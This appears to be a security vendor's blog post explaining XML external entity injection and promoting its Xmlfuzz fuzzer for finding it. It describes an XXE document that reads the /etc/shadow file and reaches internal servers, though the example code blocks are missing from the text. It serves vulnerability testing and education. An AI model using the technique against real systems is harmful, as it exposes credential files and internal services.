Finding XML Entity Injection Problems
XML is a wonderful specification but could be very insecure if misused. I personally believe that XML is insecure because of its over-complicated abstractions that allow you to do a lot of things painlessly but also opens the gates all sorts of problems. One such class of problems is known as entity injection attacks.
What Is Entity Injection
Well, entity injection is an known and very old trick, which allows an attacker to insert XML entities (a special mechanism in XML) into XML documents and as such access arbitrary resources. XML entities come in the format of
&entityname; are effectively act as text replacement. For example if the entity
&name; is linked to the text
John the XML document
<doc>Hello &name;!</doc> will effectively become
<doc>Hello John!</doc>. This is just one of the trivial cases but there is so much more one can do.
The more severe kind of entity injection is when
SYSTEM entities are in use, a.k.a externals. A system entity has the following syntax defined at the top of the document as part of the DTD section:
If the DTD declaration is processed, which is the default behaviour in many frameworks, then an attacker may be able to access any file from the local file system and sometimes even make arbitrary HTTP requests to internal servers. As you may have guess already, this is a severe attack that often leads to a full compromise of the target system.
How To Find XML Entity Injection Problems
Identifying entity injection is relatively straightforward process. It works by simply constructing a document with a valid DTD declaration that contains at least one external entity. In the body of the document we simply try to to use the entity name in various ways in order to achieve the desired effect. For example, a document like the one illustrated bellow could potentially be used to read the contents of
/etc/shadow file if the remote server is vulnerable and the contents of the entity is echoed back to the user:
To test complex XML structures we need not only to vary the URI the entity is pointing to, in order to avoid security filters, but also use the entity on its own or in combination with valid data within elements or inside element attributes. This exercise could get quickly very complex and tedious, especially with large documents, and this is why the best way to find this particular kind of vulnerability is to use a fuzzer.
Using a Fuzzer
This is where Xmlfuzz is entering the picture. Xmlfuzz is a smart XML fuzzer, which works by first understanding the structure of a XML document and then trying various combinations of invalid input in order to find vulnerabilities, including the XML entity injection kind. This is done by walking the tree structure (recursively) of the XML document and injecting pieces of data which we know that could result in abnormal behaviour.
The process works swiftly even on very large and complex documents and can be repeated as many times as we want to fuzz documents that are already fuzzed once in order to find out more interesting scenarios - feature known as a second level fuzzing. Xmlfuzz is straightforward to use. The tool takes just a valid HTTP request with a valid XML document as part of the request body. The rest is automatically done for your own convenience.
For more information and a wall-trough how to start a fuzz simply follow the "Fuzzing XML" article on Websecurify Learning Portal.